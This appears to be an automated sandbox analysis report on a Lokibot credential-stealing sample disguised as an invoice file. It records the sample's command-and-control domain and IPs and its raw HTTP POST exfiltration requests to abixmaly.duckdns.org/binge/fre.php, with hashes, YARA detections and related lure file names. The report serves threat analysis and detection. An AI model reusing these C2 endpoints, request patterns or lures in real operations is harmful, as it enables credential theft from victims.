• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, au.c-0001.c-msedge.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
23:25:50 | API Interceptor | 1x Sleep call for process: RegSvcs.exe modified

                                Joe Sandbox View / Context

                                IPs

Match: 192.169.69.26
Associated Sample Name / URL | Detection | Context
• Samples and listed Products.exe | malicious | abixmaly.duckdns.org/binge/fre.php
• Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | abixmaly.duckdns.org/binge/fre.php
• MglhrJiLUL.exe | malicious | 195.245.112.115/index.php
• On35KJkYT4.exe | malicious | 195.245.112.115/index.php
• Order_List.xlsx | malicious | dubaisupport.duckdns.org/file.exe

                                Domains

Match: abixmaly.duckdns.org
Associated Sample Name / URL | Detection | Context
• Samples and listed Products.exe | malicious | 192.169.69.26
• Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | 192.169.69.26
• remittance for USD 8,752.16.exe | malicious | 35.246.120.60
• invoice for your ref.exe | malicious | 35.246.120.60
• PTI invoice of oc 4f -36..exe | malicious | 35.246.120.60
• contract YF8536851-1.exe | malicious | 35.246.120.60
• GPxOawyspo.exe | malicious | 35.246.120.60
• bank transfer SWIFT.exe | malicious | 35.246.120.60

                                ASN

Match: WOWUS
Associated Sample Name / URL | Detection | Context
• Samples and listed Products.exe | malicious | 192.169.69.26
• Bank Payment Transfer for PI. BT-GJ21001 (our PO. 2100002(R).exe | malicious | 192.169.69.26
• PO20171118-COGRAL SPA.jar | malicious | 192.169.69.25
• New Order_R4.jar | malicious | 192.169.69.25
• 8MglQ6WLl5.exe | malicious | 45.14.115.62
• QPqcGLFnyI.exe | malicious | 192.169.69.30
• Payment Slip.xlsb | malicious | 192.169.69.25
• AFE7D487324952929F8F037BDFBD7249049086FC8C4A9.exe | malicious | 192.169.69.25
• 10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exe | malicious | 192.169.69.25
• IMG_Giris emri 20201122164730_PDF.exe | malicious | 192.169.69.25
• ORDER-21611docx.exe | malicious | 192.169.69.25
• 4714D68DBB9F9AC36425F2EC73ED434CF57407F36063C.exe | malicious | 192.169.69.25
• ORDER-6010.pdf.exe | malicious | 192.169.69.25
• 9CCC5F07D0BF7152841C893C892DF407C854D5FF45C1A.exe | malicious | 192.169.69.26
• 0F4F0709D120ABA22D4687BFABFA5004DD54B0FCC6EF1.exe | malicious | 192.169.69.25
• WNr7kU4wSU.exe | malicious | 192.169.69.26
• 2ga2LylVIM.exe | malicious | 192.169.69.25
• AFa8kUgrni.exe | malicious | 192.169.69.25
• u8SFl9j1I8.exe | malicious | 45.14.115.62
• 66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exe | malicious | 192.169.69.25

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.log
                                Process:C:\Users\user\Desktop\Invoice and BL.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):414
                                Entropy (8bit):0.6553179628425584
                                Encrypted:false
                                SSDEEP:3:/lbOllbOllbOllbOllbON:O
                                MD5:5D9D7B3222A4B52C61F455AFA027CAE4
                                SHA1:36BF394ABFBAF545FD187CE75BC76750CB0E3A08
                                SHA-256:7B86820B53F41B8F9DD41C3F6F564796DA458F672AEB7EBA03C422252846B551
                                SHA-512:27E36988F84BDFEE83F99FE2FCF1D98C3F6E4C3BFBC74958475B13243561016976D4F1998972B41C9D23CF5EE8307D84F0FE61711C140BD3D0E38E44A7403BFE
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.064655736923516
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:Invoice and BL.exe
                                File size:530432
                                MD5:3c7b342067f6142e6ed45551f5f60c50
                                SHA1:d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
                                SHA256:419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
                                SHA512:33dcb9c1c0a5b7445c65baf93c2e84d2824a638e6a332b7f52c7a4b7b470e19bb75d28a47f43887ef85a1a593137e5e3805882e26607a4c00d9889760371aa8c
                                SSDEEP:6144:szFdMVnEVM6k02GhNvpG+5FPx2eW1REnHhJZdSFAx7cLM7QBUWQMZFGV1R5:KFdM5X02iNv4sjWTGmY7/DMZFUR5
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..............-... ...@....@.. ....................................@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x482d82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6100F2E2 [Wed Jul 28 06:02:10 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                (the remaining bytes of the preview are all zero; each pair decodes to "add byte ptr [eax], al")

                                Data Directories

                                Name                                 | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x82d30         | 0x4f         | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x84000         | 0x5f0        | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x86000         | 0xc          | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

                                Sections

                                Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy        | Characteristics
                                .text  | 0x2000          | 0x80d88      | 0x80e00  | False    | 0.661054194956  | data      | 7.07527531972  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc  | 0x84000         | 0x5f0        | 0x600    | False    | 0.434244791667  | data      | 4.23356085492  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x86000         | 0xc          | 0x200    | False    | 0.044921875     | data      | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name        | RVA     | Size  | Type                                                                        | Language | Country
                                RT_VERSION  | 0x84090 | 0x360 | data                                                                        |          |
                                RT_MANIFEST | 0x84400 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |          |

                                Imports

                                DLL         | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description      | Data
                                Translation      | 0x0000 0x04b0
                                LegalCopyright   | Copyright Thomas ICHE 2011
                                Assembly Version | 1.0.0.0
                                InternalName     | sH7BDA6.exe
                                FileVersion      | 1.0.0.0
                                CompanyName      | Thomas ICHE
                                LegalTrademarks  |
                                Comments         |
                                ProductName      | NodeGraph Control
                                ProductVersion   | 1.0.0.0
                                FileDescription  | NodeGraph Control
                                OriginalFilename | sH7BDA6.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                Timestamp                           | Source Port | Dest Port | Source IP     | Dest IP
                                Aug 3, 2021 23:25:48.240401983 CEST | 49735       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:48.546915054 CEST | 80          | 49735     | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:48.547018051 CEST | 49735       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:48.549781084 CEST | 49735       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:48.989089012 CEST | 80          | 49735     | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:49.217688084 CEST | 49736       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:49.590460062 CEST | 80          | 49736     | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:49.590812922 CEST | 49736       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:49.594585896 CEST | 49736       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:50.064380884 CEST | 80          | 49736     | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:50.286206007 CEST | 49737       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:50.621546030 CEST | 80          | 49737     | 192.169.69.26 | 192.168.2.3
                                Aug 3, 2021 23:25:50.621686935 CEST | 49737       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:50.624500036 CEST | 49737       | 80        | 192.168.2.3   | 192.169.69.26
                                Aug 3, 2021 23:25:51.116770983 CEST | 80          | 49737     | 192.169.69.26 | 192.168.2.3

                                UDP Packets


                                DNS Queries

                                Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                 | Type           | Class
                                Aug 3, 2021 23:25:48.091098070 CEST | 192.168.2.3 | 8.8.8.8 | 0x848a   | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:49.182408094 CEST | 192.168.2.3 | 8.8.8.8 | 0xa9e8   | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:50.152689934 CEST | 192.168.2.3 | 8.8.8.8 | 0x7bff   | Standard query (0) | abixmaly.duckdns.org | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                 | CName | Address       | Type           | Class
                                Aug 3, 2021 23:25:48.221827030 CEST | 8.8.8.8   | 192.168.2.3 | 0x848a   | No error (0) | abixmaly.duckdns.org |       | 192.169.69.26 | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:49.215876102 CEST | 8.8.8.8   | 192.168.2.3 | 0xa9e8   | No error (0) | abixmaly.duckdns.org |       | 192.169.69.26 | A (IP address) | IN (0x0001)
                                Aug 3, 2021 23:25:50.283862114 CEST | 8.8.8.8   | 192.168.2.3 | 0x7bff   | No error (0) | abixmaly.duckdns.org |       | 192.169.69.26 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • abixmaly.duckdns.org

                                HTTP Packets

                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                0          | 192.168.2.3 | 49735       | 192.169.69.26  | 80               | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp                           | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:48.549781084 CEST | 1329               | OUT       | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                1          | 192.168.2.3 | 49736       | 192.169.69.26  | 80               | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp                           | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:49.594585896 CEST | 1336               | OUT       | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                2          | 192.168.2.3 | 49737       | 192.169.69.26  | 80               | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Timestamp                           | kBytes transferred | Direction | Data
                                Aug 3, 2021 23:25:50.624500036 CEST | 1337               | OUT       | POST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 163
                                Connection: close


                                Code Manipulations

                                Statistics

                                Behavior

                                System Behavior

                                General

                                Start time:23:25:05
                                Start date:03/08/2021
                                Path:C:\Users\user\Desktop\Invoice and BL.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Invoice and BL.exe'
                                Imagebase:0x370000
                                File size:530432 bytes
                                MD5 hash:3C7B342067F6142E6ED45551F5F60C50
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time:23:25:45
                                Start date:03/08/2021
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:{path}
                                Imagebase:0x830000
                                File size:45152 bytes
                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Loki_1, Description: Loki Payload, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Disassembly

                                Code Analysis
